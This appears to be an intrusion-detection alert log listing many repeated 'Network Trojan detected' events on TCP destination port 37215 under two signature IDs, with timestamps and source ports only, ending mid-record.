              Timestamp:05/24/24-10:59:28.200648
              SID:2835222
              Source Port:53182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694686
              SID:2829579
              Source Port:50500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452740
              SID:2829579
              Source Port:60658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535545
              SID:2829579
              Source Port:39634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802768
              SID:2835222
              Source Port:47524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279638
              SID:2829579
              Source Port:48206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608671
              SID:2829579
              Source Port:54126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.398254
              SID:2835222
              Source Port:49164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554134
              SID:2829579
              Source Port:54278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589420
              SID:2829579
              Source Port:46250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482726
              SID:2835222
              Source Port:48234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.964071
              SID:2829579
              Source Port:51538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097785
              SID:2835222
              Source Port:35902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726355
              SID:2835222
              Source Port:35832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636776
              SID:2835222
              Source Port:46126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100562
              SID:2829579
              Source Port:53928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400514
              SID:2829579
              Source Port:51190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327825
              SID:2835222
              Source Port:49516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.567353
              SID:2835222
              Source Port:45038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857143
              SID:2835222
              Source Port:55982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574722
              SID:2829579
              Source Port:36844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988821
              SID:2835222
              Source Port:35322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.114128
              SID:2829579
              Source Port:43228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329457
              SID:2829579
              Source Port:50316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926268
              SID:2835222
              Source Port:53800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.107979
              SID:2829579
              Source Port:41040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525339
              SID:2835222
              Source Port:48740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189475
              SID:2829579
              Source Port:48998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551773
              SID:2829579
              Source Port:45078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965811
              SID:2829579
              Source Port:48994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128110
              SID:2829579
              Source Port:45604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582505
              SID:2829579
              Source Port:51110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750415
              SID:2835222
              Source Port:58572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402690
              SID:2829579
              Source Port:36996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797810
              SID:2829579
              Source Port:38750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860041
              SID:2835222
              Source Port:35808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285009
              SID:2835222
              Source Port:49138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121525
              SID:2829579
              Source Port:57632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372476
              SID:2829579
              Source Port:42668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633660
              SID:2829579
              Source Port:50080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187404
              SID:2835222
              Source Port:34834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858449
              SID:2835222
              Source Port:43780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923459
              SID:2829579
              Source Port:35836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481671
              SID:2829579
              Source Port:36436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579546
              SID:2829579
              Source Port:33926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517831
              SID:2829579
              Source Port:40512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664573
              SID:2829579
              Source Port:51216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396307
              SID:2829579
              Source Port:48368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685356
              SID:2835222
              Source Port:55414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283456
              SID:2835222
              Source Port:48716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060065
              SID:2829579
              Source Port:46480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055297
              SID:2829579
              Source Port:46778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362078
              SID:2835222
              Source Port:41364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692460
              SID:2829579
              Source Port:49420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860018
              SID:2835222
              Source Port:57456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490868
              SID:2835222
              Source Port:56868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494317
              SID:2835222
              Source Port:48934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857773
              SID:2829579
              Source Port:35220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926736
              SID:2835222
              Source Port:33270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102874
              SID:2835222
              Source Port:55854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525139
              SID:2835222
              Source Port:51098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724402
              SID:2835222
              Source Port:54176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341244
              SID:2835222
              Source Port:37272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099806
              SID:2829579
              Source Port:51912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187102
              SID:2835222
              Source Port:35518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099498
              SID:2829579
              Source Port:53686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695056
              SID:2835222
              Source Port:50092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103470
              SID:2829579
              Source Port:32906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402185
              SID:2835222
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664560
              SID:2835222
              Source Port:33044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374787
              SID:2835222
              Source Port:52242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979416
              SID:2829579
              Source Port:42938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.829500
              SID:2829579
              Source Port:53566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970779
              SID:2829579
              Source Port:44802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.346986
              SID:2829579
              Source Port:43554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078132
              SID:2829579
              Source Port:49426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378049
              SID:2829579
              Source Port:37926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549362
              SID:2835222
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796580
              SID:2835222
              Source Port:40214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289256
              SID:2829579
              Source Port:45794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534393
              SID:2829579
              Source Port:41024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481697
              SID:2835222
              Source Port:37584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235547
              SID:2829579
              Source Port:56564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624353
              SID:2835222
              Source Port:56118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422325
              SID:2835222
              Source Port:38076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.419009
              SID:2829579
              Source Port:50314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749823
              SID:2835222
              Source Port:36546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484311
              SID:2835222
              Source Port:58092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101464
              SID:2835222
              Source Port:39522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117122
              SID:2829579
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474113
              SID:2835222
              Source Port:36488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965826
              SID:2829579
              Source Port:58428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573903
              SID:2829579
              Source Port:37908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534450
              SID:2835222
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726535
              SID:2835222
              Source Port:39548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663551
              SID:2835222
              Source Port:57860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130138
              SID:2835222
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663611
              SID:2829579
              Source Port:55734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.917983
              SID:2829579
              Source Port:46226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152510
              SID:2835222
              Source Port:36898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064470
              SID:2829579
              Source Port:56358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.682380
              SID:2835222
              Source Port:49960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833060
              SID:2835222
              Source Port:56394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766249
              SID:2829579
              Source Port:48376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516265
              SID:2835222
              Source Port:59132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924232
              SID:2835222
              Source Port:37200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494734
              SID:2835222
              Source Port:55922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109405
              SID:2835222
              Source Port:37648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484470
              SID:2835222
              Source Port:51528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537069
              SID:2835222
              Source Port:33112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099704
              SID:2829579
              Source Port:44498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603690
              SID:2835222
              Source Port:43396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926896
              SID:2835222
              Source Port:48776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102159
              SID:2829579
              Source Port:57280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347551
              SID:2829579
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.365456
              SID:2829579
              Source Port:39818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578026
              SID:2829579
              Source Port:46676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802073
              SID:2829579
              Source Port:42176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204838
              SID:2835222
              Source Port:51088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486147
              SID:2835222
              Source Port:42838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638168
              SID:2835222
              Source Port:46692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112773
              SID:2829579
              Source Port:44746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.380305
              SID:2835222
              Source Port:46464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548218
              SID:2829579
              Source Port:53048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152875
              SID:2835222
              Source Port:41690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044853
              SID:2829579
              Source Port:54926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835231
              SID:2835222
              Source Port:33402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300263
              SID:2835222
              Source Port:43790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443658
              SID:2829579
              Source Port:51640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623693
              SID:2835222
              Source Port:37712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685342
              SID:2835222
              Source Port:37900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343466
              SID:2835222
              Source Port:39654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456202
              SID:2835222
              Source Port:47250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116086
              SID:2829579
              Source Port:50156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402882
              SID:2829579
              Source Port:41060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303320
              SID:2829579
              Source Port:46772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503354
              SID:2829579
              Source Port:34306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154149
              SID:2835222
              Source Port:52856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545704
              SID:2835222
              Source Port:60248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.602678
              SID:2829579
              Source Port:50684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430721
              SID:2829579
              Source Port:49246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663652
              SID:2835222
              Source Port:48314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625706
              SID:2835222
              Source Port:58198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664521
              SID:2829579
              Source Port:37942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433361
              SID:2829579
              Source Port:38470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775281
              SID:2829579
              Source Port:35382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234671
              SID:2829579
              Source Port:42006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918390
              SID:2835222
              Source Port:47056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923381
              SID:2835222
              Source Port:38916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804745
              SID:2835222
              Source Port:54332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285961
              SID:2829579
              Source Port:46148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278819
              SID:2835222
              Source Port:34212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078139
              SID:2835222
              Source Port:38216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482220
              SID:2829579
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397761
              SID:2829579
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365196
              SID:2835222
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598465
              SID:2829579
              Source Port:35844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601385
              SID:2835222
              Source Port:40828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.105015
              SID:2835222
              Source Port:52964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451239
              SID:2829579
              Source Port:53970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.068060
              SID:2829579
              Source Port:49026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451911
              SID:2829579
              Source Port:35404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928640
              SID:2829579
              Source Port:59776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459680
              SID:2829579
              Source Port:57190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.773267
              SID:2835222
              Source Port:39166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574389
              SID:2829579
              Source Port:41292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391347
              SID:2835222
              Source Port:58158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490500
              SID:2835222
              Source Port:38688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194384
              SID:2835222
              Source Port:55012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103580
              SID:2829579
              Source Port:43164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870275
              SID:2835222
              Source Port:44956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489491
              SID:2829579
              Source Port:54512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485994
              SID:2829579
              Source Port:51688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860117
              SID:2829579
              Source Port:35842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575541
              SID:2835222
              Source Port:41986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457820
              SID:2829579
              Source Port:55728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232665
              SID:2829579
              Source Port:52438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624451
              SID:2835222
              Source Port:47828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241994
              SID:2835222
              Source Port:59646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.385495
              SID:2835222
              Source Port:46590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534853
              SID:2829579
              Source Port:33322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749139
              SID:2829579
              Source Port:58444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235724
              SID:2829579
              Source Port:43794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536562
              SID:2835222
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449160
              SID:2835222
              Source Port:33742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506446
              SID:2829579
              Source Port:57268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992206
              SID:2829579
              Source Port:44916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575817
              SID:2829579
              Source Port:53678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578802
              SID:2829579
              Source Port:52786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116665
              SID:2829579
              Source Port:47112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327772
              SID:2835222
              Source Port:40784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503748
              SID:2835222
              Source Port:46632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122137
              SID:2835222
              Source Port:51924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207159
              SID:2835222
              Source Port:55554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121277
              SID:2829579
              Source Port:53708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549362
              SID:2829579
              Source Port:35686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480444
              SID:2835222
              Source Port:54404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234730
